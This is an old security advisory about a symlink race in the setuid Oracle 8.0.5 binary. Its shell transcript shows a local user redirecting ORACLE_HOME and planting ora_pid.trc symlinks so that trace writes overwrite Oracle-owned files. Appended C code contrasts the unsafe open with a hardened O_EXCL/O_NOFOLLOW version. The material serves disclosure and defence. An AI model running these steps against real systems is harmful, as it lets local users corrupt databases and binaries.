WWW.PLAZASITE.COM
System & Security Division

Title:    Vulnerability in oracle binary in Oracle 8.0.5
Date:     11-12-2000
Platform: Only tested in Linux, but can be "exported" to others.
Impact:   Any user can compromise any file owned by oracle (database owner).
Author:   Juan Manuel Pascual (pask@plazasite.com)
Status:   Vendor Contacted at 18th July 2001

PROBLEM SUMMARY:

There is a write permission checking error in the oracle binary that can be used by local users to write to any file owned by oracle.

IMPACT:

Any user with local access can corrupt the database, overwrite oracle binaries, etc.

SOLUTION:

Chmod -s ;-)))).

STATUS:

Vendor was contacted.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba    pask@plazasite.com

Only for educational purposes. (Corrupting a database isn't an educational purpose!)

[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
-rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc

Oops: a log owned by oracle, with the name structure ora_pid.trc. I can create:

[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...

until the log name is my link, and I overwrite the binary. What about dbf files, and so on ....
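
The root cause shown above is a privileged process creating ora_pid.trc in a directory the caller controls and following whatever already sits at that name. The following is an added example, not Oracle's code and not part of the original advisory: it contrasts an assumed vulnerable open with a hardened one on a constructed victim file. The function names, the temporary directory and pid 4242 are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed vulnerable pattern (not Oracle's source): a pre-planted symlink
 * at the trace name is followed and its target is truncated. */
static int open_trace_unsafe(const char *dir, long pid) {
    char path[512];
    snprintf(path, sizeof path, "%s/ora_%ld.trc", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0640);
}

/* Hardened: O_EXCL fails with EEXIST if the name exists, symlinks included;
 * O_NOFOLLOW additionally refuses a symlink as the final path component. */
static int open_trace_safe(const char *dir, long pid) {
    char path[512];
    snprintf(path, sizeof path, "%s/ora_%ld.trc", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0640);
}

/* Constructed scenario: a 6-byte victim file with a symlink at the trace
 * name. Returns the victim's size after the open, or -1 on setup failure. */
static long victim_size_after(int use_safe) {
    char dir[] = "/tmp/trcdemoXXXXXX", victim[64], link_path[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link_path, sizeof link_path, "%s/ora_4242.trc", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("binary", f);
    fclose(f);
    if (symlink(victim, link_path) != 0) return -1;
    int fd = use_safe ? open_trace_safe(dir, 4242) : open_trace_unsafe(dir, 4242);
    if (fd >= 0) close(fd);
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(link_path); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    printf("unsafe open: victim is now %ld bytes\n", victim_size_after(0));
    printf("safe open:   victim is now %ld bytes\n", victim_size_after(1));
    return 0;
}
```

A setuid program should also ignore caller-supplied environment variables such as ORACLE_HOME when choosing where to write, or drop to the real uid before creating the file.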